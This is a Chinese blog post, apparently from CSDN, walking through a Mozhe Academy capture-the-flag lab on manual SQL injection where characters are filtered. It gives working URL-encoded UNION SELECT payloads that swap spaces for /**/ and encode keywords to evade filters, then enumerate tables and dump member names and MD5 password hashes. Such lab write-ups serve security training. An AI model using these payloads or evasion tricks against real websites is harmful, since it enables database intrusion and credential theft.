墨者学院—SQL过滤字符后手工注入漏洞测试(第2题)

本文详细记录了一次SQL注入漏洞的测试过程,包括利用/**/替换空格进行注入,通过URL编码绕过字符过滤,以及逐步查询数据库的表名、列名,最终获取敏感信息并解密账号密码。此案例展示了SQL注入攻击的常见手法及防御措施的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶场地址:SQL过滤字符后手工注入漏洞测试(第2题)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

进入靶场

 

老规矩,用and来判断注入。

 

猜测是and或者是空格被过滤了,用/**/代替空格试试 

证据确凿,直接拷走

接下来查询order by 查询列,在第五列页面不回显,判断有四列数据

 

然后查询数据库,又被拦截了,那估计就是过滤了union或者select等字符,URL编码绕过试试

 

在第二段和第三段有回显,那就在这注入。

 

查询数据库

http://124.70.71.251:40278/new_list.php?id=0/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%32%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%73%63%68%65%6d%61%5f%6e%61%6d%65%29%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%73%63%68%65%6d%61%74%61

 


查询表

http://124.70.71.251:40278/new_list.php?id=0/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%32%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%74%61%62%6c%65%5f%6e%61%6d%65%29%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73/%2a%2a/%77%68%65%72%65/%2a%2a/%74%61%62%6c%65%5f%73%63%68%65%6d%61=%64%61%74%61%62%61%73%65%28%29

 


查询stormgroup_member的列

http://124.70.71.251:40278/new_list.php?id=0/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%32%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%2c%33/%2a%2a/%66%72%6f%6d/%2a%2a/%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73/%2a%2a/%77%68%65%72%65/%2a%2a/%74%61%62%6c%65%5f%6e%61%6d%65=%27%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72%27

 


查询name和password

http://124.70.71.251:40278/new_list.php?id=2/%2a%2a/%75%6e%69%6f%6e/%2a%2a/%73%65%6c%65%63%74/%2a%2a/%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%6e%61%6d%65%29%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%70%61%73%73%77%6f%72%64%29%2c%34/%2a%2a/%66%72%6f%6d/%2a%2a/%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72

 


md5解密,得到账号密码,登录。得到flag
 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值